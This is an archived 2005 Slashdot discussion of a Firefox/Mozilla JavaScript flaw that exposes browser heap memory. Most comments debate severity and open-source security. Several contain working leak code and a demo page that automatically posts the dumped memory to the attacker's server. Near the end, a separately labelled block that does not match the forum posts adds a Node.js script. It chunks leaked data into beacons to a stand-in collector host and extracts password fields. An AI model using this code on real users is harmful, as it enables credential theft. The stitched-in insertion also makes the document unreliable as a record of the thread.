Mozilla / Firefox Memory Exposure Vulnerability

JimmyM writes "Secunia has a story regarding a new severe vulnerability in the Mozilla Suite and Firefox browser, which can be exploited by any web site to read all memory, which the browser process has access to. No patch is available from Mozilla. A demonstration is available here."
  • by astrashe ( 7452 ) on Monday April 04, 2005 @04:06PM (#12136993) Journal
    Did the Mozilla/Firefox guys ignore a warning about this, or did this site publish the vulnerability without giving them a chance to patch?
  • Confusing write-up (Score:4, Interesting)

    by Smack ( 977 ) on Monday April 04, 2005 @04:10PM (#12137036) Homepage
    Can a remote site actually get access to this information, or is it only displayable on the screen?
    • It's available to javascript, which is fully capable of doing a browser redirect and sending the mem dump along as GET data.
    • by cjsnell ( 5825 ) on Monday April 04, 2005 @04:13PM (#12137082) Journal
      Can a remote site actually get access to this information, or is it only displayable on the screen?

      The data is being displayed within a TEXTAREA box, so it's probably as simple as adding an onClick="javascript:document.form.submit();" (or onMouseOver, etc.) to the document.

      Yes, this is very dangerous.
      • Ok, confirmed (Score:5, Informative)

        by cjsnell ( 5825 ) on Monday April 04, 2005 @04:44PM (#12137513) Journal
        You can write a nasty little page that continuously dumps the 10k bytes of memory data to a file on your server. Here's an example that uses an HTML::Mason [masonhq.com] page to do this:
        <HTML>
        <HEAD>
        <TITLE>Nasty Demo</TITLE>
        </HEAD>
        <BODY BGCOLOR='#FFFFFF' TEXT='#222222' onLoad="readMemory();">
        <SCRIPT language="JavaScript">
        // Strips the trailing "end" marker. The callback form of replace()
        // is what the demo relies on to get heap contents back in the string.
        function genGluck(str){
        var x = str;
        var rx=/end/i;
        x = x.replace(rx,function($1){
        $1.match(rx);
        return "";
        });
        x = x.replace(/^end/,"");
        return x;
        }

        function readMemory()
        {
        // First piece of readMemory() removed to satisfy Slashdot crapfilter
        // (it set "mem" by calling genGluck() on a ~10k run of X's ending in "end")

        // Keep only printable, URL/form-friendly characters before submitting
        mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

        document.nasty.result.value = mem;

        // No ACTION, so the POST goes back to this same Mason component
        document.nasty.submit();

        }

        </SCRIPT>
        <FORM METHOD=POST NAME='nasty'>
        <INPUT NAME=result TYPE=HIDDEN VALUE='' onClick='readMemory();'>
        </FORM>
        <BR><BR>
        </BODY>
        </HTML>

        <%args>
        $result => ''
        </%args>
        <%init>
        # Append whatever the browser POSTed to a file on the server
        open(OUTFILE, '>>/tmp/outfile') or die "cannot open /tmp/outfile: $!";
        print OUTFILE $result;
        close(OUTFILE);
        </%init>
    • Well it would seem that since the demonstration output the information it read into that textbox, it was able to read the information directly from memory. Then again, I'm not an expert, so although I'm quite positive, I can't say for sure.
    • AFAIK, JavaScript could do something with this information, such as load an image that has ?randominfo appended, and this could be extracted from the server logs, or it could fill in a hidden item on a POST form that you're about to submit to be less obvious about it.
    • by Kelerain ( 577551 )
      If they can display it in a form like that, they could submit that information in a hidden form window on a site where you typically expect to submit info (a login page, for example). JavaScript can talk to a website back end as well, I think.

      Also from the article:
      "A vulnerability has been discovered in various Mozilla products, which can be exploited by malicious people to gain knowledge of potentially sensitive information."

      So yeah, this is a bit more dangerous than the old load the root folder in an ifr
    • by Sentry21 ( 8183 ) on Monday April 04, 2005 @04:18PM (#12137134) Journal
      Javascript could access this, then send that information to a form via a GET request (URLencoded) to a script via a 1x1 pixel iframe hidden on the page, or even a display: hidden; iframe for that matter.

      I don't think this is necessarily a huge problem - it's a critical bug, but until we see some major code execution or phishing, it probably won't be as big of a deal as it could be.

      The question is, can they find out how big of a memory chunk they can read before they start reading? If so, they could grab god knows how many megs and start uploading it somewhere (somehow - that's too big for a GET query) and just dump it, but if they read too much and try to read what Firefox can't access, it should (emphasis 'should') get killed by Windows instead of failing silently.
  • I'm shocked! (Score:5, Interesting)

    by samael ( 12612 ) <Andrew@Ducker.org.uk> on Monday April 04, 2005 @04:13PM (#12137083) Homepage
    I seem to recall that every time an IE bug appeared people would say that Mozilla was much more secure, and that it wasn't just that IE was targeted by hackers because of its popularity, but that the software was inherently more secure.

    But now it seems there are patches for Mozilla every few weeks for _exactly_ the same kind of problems that IE used to get slated for.

    Is Mozilla actually more secure? Or is it just as bad as any other piece of software?
    • It's getting used more than it used to---that's a big part of it.
    • Maybe the reason for this is the growing usage of Mozilla applications. One reason often given for the security of open source (and macs) is that more users use Microsoft etc. products, which makes them larger targets. Just my two cents.
    • Re:I'm shocked! (Score:3, Informative)

      by FidelCatsro ( 861135 )
      From the looks of it, these problems are not affecting the rest of the OS (as far as I can tell from the explanation on Secunia). I did a few tests and it is only reading the memory area from the browser; how far into the memory it can go I do not know (does it say? The Secunia advisory is shallow on details as usual).
      Well, unlike MSIE this is a bug rather than a feature (ActiveX), and all software has bugs, but apparently it is patched so will be rolled out soon.
      Getting details on this is not the easiest but aco
      • How in the hell is that flamebait? I think you have a Troll with mod points after you. I shall sacrifice my karma (n00b karma, no loss, I can gain it back later) by being offtopic and insulting the mod here. I was reading over the bug report myself and came across the same thing, so if anyone could expand on whether this is true and has it been around for 8 years then please do tell us. Bad moderation, really bad. Fidel, welcome to my friend list.
    • The possibility of identity theft is nothing to be careless about. However, Mozilla on Unix/Linux still has the advantage over IE on Windows, in that a normal user account is not able to take down the entire system without considerable effort on the part of the attacker. Desktop Windows pre-XP had no problem with anything a user did, up to and including deleting the C:\WINDOWS directory.

      So the original assertion is still, at least partly true: The software underneath the apps is more secure.
      • Re:I'm shocked! (Score:3, Insightful)

        by samael ( 12612 )
        Which is fair enough.

        Of course, I can reinstall the OS in about two hours.

        It's my documents I actually care about...
        • You can reinstall the OS in about two hours, sure. If you know you've been owned. So, then, do you reinstall every day? Every 12 hours? If you care about your documents, does it matter being owned? I think so.
        • Two hours doing something you didn't want to do is a lot of time.
          Two hours when you have a deadline is a lot of money.
          Two hours in the workplace would not be acceptable.

          Plus, you would need to know your system has been compromised in the first place, and then reinstall the same insecure software.

          With mozilla, you could wait 8 more hours, and install a patched version of your software.
      • in that a normal user account is not able to take down the entire system without considerable effort on the part of the attacker

        To be fair, a good bug in Mozilla can take your X server down, or at least make it so unresponsive that you can't do anything. Or it could kill your window manager, probably logging you out. And if things do get really stuck, you may have to log in from another system (or hit the vulcan nerve pinch keys -- either kill X, get to a VC and maybe C-A-D.)

        Not quite as bad as ta

    • Mozilla is at version 1.7.5 and Firefox is at version 1.x. IE is approaching version 7.0. Microsoft has billions of dollars and more than enough developers and other personnel to make a secure product. Mozilla may have more security flaws in the short run, but it will have less in the long run because more careful consideration was made during development.
    • Re:I'm shocked! (Score:4, Informative)

      by NanoGator ( 522640 ) on Monday April 04, 2005 @05:07PM (#12137796) Homepage Journal
      "Is Mozilla actually more secure? Or is it just as bad as any other piece of software?"

      It's a commonly held belief that Microsoft programmers come from Elbonia. Once it is accepted that Mozilla programmers are just as Elbonian as MS programmers, the security zealotry will die down.

      (Disclaimer 1: This post does not say that Mozilla is less secure (or more secure, for that matter) than IE. This post does not say that Mozilla programmers are incompetent. This post does address zealotry and nothing else.)

      (Disclaimer 2: It really fucking pisses me off that I have to write this stupid disclaimer because lots of people with mod-points will not accept anything that's even remotely negative about Mozilla. Learn how to take criticism before dispensing it.)
      • I sincerely agree with disclaimer 2 - I _wasn't_ saying Mozilla was worse, or as bad. I was merely pointing out the disjunction between what I'd been told and what I was seeing and asking whether I was seeing things...
      • MS programmers come from who-knows-where, and no one can see their code to see if it's good.
        MS feature list comes from marketing dept. Its release deadlines, from marketing dept + the reality. If reality-based delays don't meet marketing expectations, we don't know what they do.

        Mozilla developers can be put to test, because we can read their code, there is even people who do read their code. If you got any conclusions on the mozilla developers skill, you couldn't extrapolate them to MS developers, because y
        • "MS programmers come from who-knows-where,"

          And Open Source programmers come from the good programmers cabbage patch or something?

          " there is even people who do read their code."

          If they feel like it. Sadly, errors and half-assed functionality still get through.

          "Mozilla feature list comes from user feedback + whatever the maintainers feel is sensible to add."

          Whatever they feel like adding. (Or, more appropriately, copying from another app.)

          "So, what I mean is that there can be other reasons than
          • Opera suxx : )

            I believe you are not quoting right.
            The OP stated that there is some amount of error inherent to software development, and that MS developers were supposed to be assumed to have the same quality as mozilla developers.

            What I meant is that mozilla developers produce code of a much more measurable (for the general public) quality, and that fact for itself is important.

            What I exactly meant is that it does matter what you are using, because you can make an more informed decision about whether yo
            • "Opera suxx : )"

              Actually, from the end-user point of view, Opera's probably the best one out there. Depends on how you view it, though. :)

              "What I meant is that mozilla developers produce code of a much more measurable (for the general public) quality, and that fact for itself is important."

              I'm not sure I agree with that, but I don't think I can strongly dispute it either. Frankly, I'm not impressed with OSS software. I mean, some of it I am. A lot of it, I'm not. My idea of quality is that featur
              • Ok, again.
                Opera, I used to like.
                Now I don't use windows anymore, and I choose not to use non-free software, for ethical rather than technical reasons. That doesn't mean I don't care about features. I even run some non-free software when I just need to, to get my work done.

                What happens to me with Opera is that it was great, tabs were really great. Now Firefox is just smoother to me. I am a usability freak, too. It just happens that Firefox doesn't have usability issues that interfere with _my_ habits. I lik
                • "It just happens that Firefox doesn't have usability issues that interfere with _my_ habits. I like, for example, its handling of dialogs, explanation of actions and defaults."

                  To each is own. Me personally, I enjoy all the little things they did to make browsing easier. Magnifying glass, 'paste and go' in the address bar, the notes panel, the mail client that is brilliant for handling forum email, etc. Whenever I use FireFox, I end up looking for buttons that aren't there.

                  "When you talk about innovat
    • Re:I'm shocked! (Score:5, Interesting)

      by Ogerman ( 136333 ) on Tuesday April 05, 2005 @04:07AM (#12141824)
      Is Mozilla actually more secure? Or is it just as bad as any other piece of software?

      In terms of design decisions, you might easily say that Mozilla is more secure than IE. (not being integrated with OS and all..) In terms of coding bugs, Mozilla is no different than any other super complex piece of software. But there's another way to look at it. Because the Mozilla code is open, we might expect an ugly rash of bugs to be found near the beginning of its rise to popularity. But we might also expect this to rapidly taper off as all the major bugs are found and squashed. So you might say that now is a relatively dangerous time to use Mozilla (instead of say.. Konqueror or Safari). But, on the other hand, it's still not quite popular enough to attract the volume of real-world attacks that IE has received. Honestly, if you're some jerk running a malicious website, are you going to target this quirky bug in Mozilla or the myriad of IE exploits that are sure to pay off?

      What does bother me is that the Mozilla folks haven't taken automated updates seriously enough. I cringe to think of how many Firefox early adopters have no clue what that little red arrow at the top of their screen is. Or if they do, how many dial-up users will be patient enough to wait for the update to download.. which isn't really an update at all but a full copy of the latest version.
    • IE bugs are a real problem because you can't hide from it.
      If Mozilla has some critical bug, you can always disable Mozilla and use Konqueror until Mozilla releases a fix. That would be a day or two without Mozilla.
      In an IE scenario, you would not be able to disable IE, plus there's no reasonable amount of time after which you can expect a bug will be fixed.
      No one is talking about bug-free software. Bug-free software is just not worth it; it would take too much time and money to be useful.

      The thing with IE is
    • Whether it's open source or not doesn't mean much with respect to security.

      If you can't or don't want to do an audit of the source, it's usually safe to assume it's probably just as bad as whatever software the Mozilla programmers used to write.

      A good tree produces good fruit. A bad tree produces bad fruit. Sure you can get a tree to change, but it often takes years (see BIND, Sendmail).

      The fact that Mozilla crashes regularly (but not so predictably) on normal use (well at least my normal use ;) ) means
  • oh man (Score:2, Funny)

    by Anonymous Coward
    all those l33t hackers will be able to see all my pr0n!
  • Crashed firefox when I tried it.
  • by Anonymous Coward
    ...is faster at fixing serious security flaws than closed source. Now this here is a fairly nasty vulnerability; not as bad as remote code execution, certainly, but still something I'd want fixed on my mum's PC as quickly as possible. So I'm wondering, just how long will the Mozilla foundation take to distribute a fix for this vulnerability - not just patch it in the nightlies, as that is trivial - but include it in an automatic update, like Microsoft would? I'm betting on weeks or months (not flame-baiti
    • I'm guessing you'll see a patch within 24 hours. *Fingers crossed*
    • is faster at fixing serious security flaws than closed source

      Considering this whole thing is already fixed, it's hard to ask for faster than that!

      On the other hand...

      So I'm wondering, just how long will the Mozilla foundation take to distribute a fix for this

      That's another question altogether, and one that isn't done so well with Firefox. Still far better than with IE (where you see actively exploited vulnerabilities listed on MS's IE page that aren't fixed for months!). This is something the Mozilla folks
  • by wowbagger ( 69688 ) on Monday April 04, 2005 @04:20PM (#12137160) Homepage Journal
    It looks like, in order to make use of this flaw, the attacker must get the victim to run Javascript.

    Once again demonstrating the danger in the current mindset of "I will use Javascript to do everything, even things that can be done with plain HTML like opening a new window".

    I have my Mozilla configured to ask me if I want it to fetch Javascript from remote sites (alas, you cannot protect yourself from Javascript embedded in the HTML of the site you are visiting), to ask me if I want to run any requested plugins, and to ask me before allowing any cookies to be set on my browser.

    If you can, try this yourself - you will be AMAZED at the number of sites that insist upon setting a cookie on you the first thing when you visit them, or that insist upon trying to load Javascript, or Flash plugins.

    Cookies are fine for sites which require log-in (e.g. /.). Javascript is fine for sites that need to do some client side processing (e.g. order entry sites which use JS to compute the order amounts to avoid a round-trip to the server). Flash is fine for some applications.

    But please don't over use them.
    • Only if JavaScript is completely disabled, will this attack fail. JavaScript in the [HEAD] block executes as soon as the page loads. If this code is buried in that block, it will execute without any further intervention from the user.
    • Flash is fine for some applications.

      I have yet to see a web application in Flash that couldn't be implemented in plain HTML with maybe a touch of server-side scripting. So-called Flash "movies" don't count, because those could simply be saved to disk via web browser without involving a plugin, and then could be played back without any online component at all.

      Of greatest annoyance are websites with Flash intros lacking a way to get past the intro, or with Flash navigation instead of a simple imagemap. N
    • I will use Javascript to do everything, even things that can be done with plain HTML like opening a new window

      Opening a new window has been deprecated in XHTML - the only way to do it is JavaShit. Which is good because I hate webmasters assuming I want links opened in a new window (I almost never do - if I did I would've clicked "open in new window"). Unfortunately it's bad coz they'll just use Javascript instead. :(
  • by RzUpAnmsCwrds ( 262647 ) on Monday April 04, 2005 @04:27PM (#12137241)
    This is a *huge* hole. In three clicks, it disclosed previous URLs that I had visited, POSTDATA (including my Slashdot password) and a bunch of other stuff.

    If this could be automated (and it easily could be with something like XML-RPC), imagine the possibilities for phishing. Visit a page, have your credit card number disclosed.

    Time for Firefox 1.03.
  • Simple JavaScript (Score:2, Insightful)

    by duerra ( 684053 )
    It works if you don't click quickly and repeatedly in Firefox.

    It's almost scary... the JavaScript for this looks to just abuse a buffer overflow in an almost scary-easy way.

    function genGluck(str){
    var x = str;
    var rx=/end/i;
    x = x.replace(rx,function($1){
    $1.match(rx);
    return "";
    });
    x = x.replace(/^end/,"");
    return x;
    }

    function readMemory()
    {
    var mem = genGluck("{10,246 "X's" here}end");

    // the post was cut off here; the filter regex is completed from the same demo page
    mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");
    }
  • No problem here (Score:2, Informative)

    by jkerman ( 74317 )
    just displays all "XXXXXXXXXXX" for me.

    using OSX with nightly builds auto-downloaded with FireFix [macupdate.com] (which is a really neat app)
  • by inio ( 26835 ) on Monday April 04, 2005 @04:49PM (#12137582) Homepage
    In addition to a bunch of Xs, Safari threw a little piece of Javascript code not originating on the source page into the end of the text box. Looks like it might be a little vulnerable too.
    • No, Safari doesn't support Javascript's function objects (lambdas?), which the test seems to use. I don't know if rewriting the test in a different way would make it work, but I doubt it. It appears to be a flaw in the regular expression engine in Gecko.
  • by OmegaGX ( 120040 ) on Monday April 04, 2005 @04:50PM (#12137600) Journal
    Download the latest patched version right here: http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/firefox-1.0+.en-US.win32.installer.exe [mozilla.org]
    I just used it and I am not vulnerable: all I see are lots of X's, just like in IE.
  • by jgoemat ( 565882 ) on Monday April 04, 2005 @04:56PM (#12137669)
    This exploits a vulnerability in Mozilla/FireFox's javascript engine. It allows the javascript code on the web page to access an arbitrary amount of heap data of the FireFox application. The locations in memory and the size of the block returned cannot be set, so you basically get random data from FireFox's heap. Most likely under a kilobyte of data will be returned, and it will most likely be data from some web page or file you downloaded.

    This data is available to the javascript engine then, so it is possible for the javascript to submit it a number of ways to an internet server. It could call a web service with the data or post it to a web page. The server could then organize this data and examine it for anything interesting.

    This will not allow someone to read your personal files or hijack your computer. The real problem would be if stored passwords or sensitive data from web mail or banking sites were on the heap and were found this way and transmitted to a web site. A large amount of 'Junk' would have to be sifted through in order to get any juicy data though.

    The only way to be safe right now is (in FireFox) to go to Tools->Options, go to "Web Features", and uncheck "Enable Javascript". Seeing as many sites (including /.) require javascript to use, this really isn't a good option. I hope the team gets a fixed version out soon.
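The exfiltration path sketched in the replies above (JavaScript submitting the dump by form POST, or smuggling it out in GET parameters on an image or iframe URL, chunked because a single GET is too short for a large dump) and the server-side sifting jgoemat describes, as an added example that is not part of the original thread or of any Mozilla code. It runs in Node.js and models only the attacker-side handling of a string that page JavaScript already holds; the leak itself is not reproduced, the heap dump is constructed sample data, and the collector host `collector.example` is a placeholder.

```javascript
// Added example, not from the thread or from Mozilla. Models what a hostile
// page could do with a string of leaked heap data once JavaScript holds it,
// and what the receiving server would do with it. The leak itself is not
// reproduced: sampleHeapDump() is a CONSTRUCTED stand-in for what the
// vulnerable replace() handed back.

// Constructed stand-in for a chunk of browser heap: padding, binary junk, then
// fragments of an earlier request and its POST body. Nothing here is real data.
function sampleHeapDump() {
  const junk = String.fromCharCode(0, 1, 0x90, 0xff, 7, 0x1b);
  return 'X'.repeat(64) + junk +
    'GET /index.pl?op=userlogin HTTP/1.1\r\nHost: slashdot.org\r\n' + junk +
    'unickname=jdoe&upasswd=hunter2&op=userlogin' + junk +
    'http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/' + junk;
}

// The same character filter the posted demo applied before submitting: runs of
// anything outside a URL/form-friendly set collapse to a single space, which
// also leaves the result ASCII-only so it can be put on a URL safely.
const UNPRINTABLE = /[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g;
function sanitize(mem) {
  return mem.replace(UNPRINTABLE, ' ');
}

// Split the text into GET-sized beacons (image src / hidden iframe URLs),
// growing each chunk one character at a time so the full URL never exceeds
// maxUrlLen. `base` is a placeholder collector endpoint, not a real host.
function beaconUrls(text, base, maxUrlLen) {
  const urls = [];
  let start = 0;
  for (let i = 0; start < text.length; i++) {
    let end = start;
    let enc = '';
    while (end < text.length) {
      const next = enc + encodeURIComponent(text[end]);
      if (`${base}?i=${i}&d=${next}`.length > maxUrlLen) break;
      enc = next;
      end++;
    }
    if (end === start) throw new Error('maxUrlLen too small to carry one character');
    urls.push(`${base}?i=${i}&d=${enc}`);
    start = end;
  }
  return urls;
}

// Server side: the receiver reassembles the chunks and searches the junk for
// anything interesting. Here: absolute URLs (browsing history) and key=value
// form fields, flagging field names that look like credentials.
function sift(text) {
  const urls = Array.from(text.matchAll(/https?:\/\/[^ "'<>]+/g), m => m[0]);
  const fields = {};
  for (const m of text.matchAll(/(?:^|[&? ])([A-Za-z_]\w*)=([^& ]+)/g)) {
    fields[m[1]] = m[2];
  }
  const secrets = Object.keys(fields).filter(k => /pass|pwd|secret|token/i.test(k));
  return { urls, fields, secrets };
}

// Walk the whole path once: filter, chunk into beacons, reassemble, sift.
function demo() {
  const clean = sanitize(sampleHeapDump());
  const urls = beaconUrls(clean, 'http://collector.example/c', 200);
  const received = urls.map(u => new URL(u).searchParams.get('d')).join('');
  const found = sift(received);
  console.log(`${urls.length} beacons; credential-looking fields: ${found.secrets.join(', ')}`);
  console.log(found);
  return found;
}

demo();
```

The chunk loop measures the encoded length of the whole URL rather than the raw text, since `encodeURIComponent` turns `/`, `=`, `&` and spaces into three characters each; the sifting regexes run on the sanitized text, which is all the server ever sees.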

    • by Anonymous Coward

      Seeing as many sites (including /.) require javascript to use, this really isn't a good option.

      This is bullshit. Lots of sites use Javascript, but very few sites require Javascript. Slashdot is one example of a website that uses Javascript without requiring it.

      So ignore the parent, go ahead and switch Javascript off. If you find a website that is broken, email a complaint, and, if you trust the website, enable JavaScript for that one website, and switch it off again afterwards.

      As far as I can te

      • slightly offtopic, but: is there any firefox plugin that allows you to map which sites NEED jscript on (and then when you visit those sites, it auto 'presses' the jscript enable button)? similarly, when you switch to a tab or window that has a site that is mapped (manually, by you, in some config file) as NOT needing jscript, it disables it?

        I'd LOVE to have that. there are only a handful of sites that I use that NEED js. most don't. and in some sites, its BAD to have js on (ie, I get more ads with js t
      • Has anybody looked into making a "guess what the JavaScript does" plugin? It would examine the JavaScript on a button or link and take a guess as to what the URL it is trying to open is, and open it.

        Certainly I have been able to guess the URL by looking at one-line samples of Javascript. Is this possible in general? Would it be good enough to allow you to leave javascript off?
        • My guess is that it would go to the delete page without asking the question. However an intelligent one may be able to detect that it is too complex, and go to a page saying "it's trying to execute this javascript and here are my guesses as to the URL's it's trying to open "
    • slash requires js?

      since when?

      I disable js for all but 1 or 2 sites that I visit.

      prefbar (mozilla/firefox) allows a single click to turn on/off jscript. get it and use it.

      but you don't need js for slash. you never have.
  • comma (Score:5, Insightful)

    by Anonymous Coward on Monday April 04, 2005 @05:39PM (#12138189)
    which can be exploited by any web site to read all memory, which the browser process has access to

    I don't normally complain about the grammar and punctuation of submitters and editors, but in this case it is too significant. The difference between

    read all memory, which the browser process has access to

    and

    read all memory which the browser process has access to

    Is profound. The first form says that the browser has access to all memory. The second form says that the web site has access to all the memory to which the browser also has access. Catching and fixing stuff like this is what an editor does. If Slashdot's people can't do that, then don't call them editors. Call them "Dudes Who Click Approve," or something like that.

    • According to the grammar checker in MS Word, the second example is still incorrect, and should instead say this:
      "read all memory
      that the browser process has access to"
      The only way to pacify MS Word, if you insist upon using "which", is to put the comma before it.

      Of course, this is all to say nothing of ending the sentence with a preposition, but that hardly has the impact noted by the parent ;)
    • I think the Simpsons said it best when the family goes to the best lawyer in town and hands him a coupon:
      Coupon: "No money down!"
      Hutz: "What? This thing is all screwed up"
      [hutz writes on it]
      Coupon now reads: "No. [M]oney down!"
  • maybe my ubuntu hoary system is patched? or this doesn't affect linux?
    • Yeah I noticed same thing and posted about it somewhere here.

      Browser string is Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050404 Firefox/1.0 (Ubuntu package 1.0.2), the 4/4/05 makes me think a fix was backported for us. Gives me a little more happiness about Ubuntu and Debian, though I'm sure it has made its way into other distributions as well.

  • Firefox Version 1.02: Clicking the link repeatedly and quickly causes a crash. Any others have the same thing happen? If so, this could be a bigger problem than just a security hole.
    • Re:CRASH? (Score:3, Interesting)

      by srstoneb ( 256638 )
      The first time I tried it, it didn't merely crash Firefox. When I clicked the "test now" link my entire system immediately died, and began rebooting. After reboot, the test now works (and confirms my vulnerability).

      Windows 98 SE, Firefox 1.0.2.
      • whole system crash? Haven't had any of those since ME. I suspect 98SE. Something is wiggy with the javascript. I've never really liked it and this proves that Java is not the cure-all to every application need.
  • I'm running Firefox 1.0.1. I'm STILL waiting for the updater to report that 1.0.2 is available. Even if I manually tell it to check for updates, it says none are available.

    If they haven't even put 1.0.2 onto the autoupdater, how long will it be before patches like this make it out? It's pretty stupid.
  • by Lazyhound ( 542184 ) on Monday April 04, 2005 @10:30PM (#12140308)
    K-Meleon has the same problem, only it probably won't be patched for months, forcing me back to Firefox. Bah.
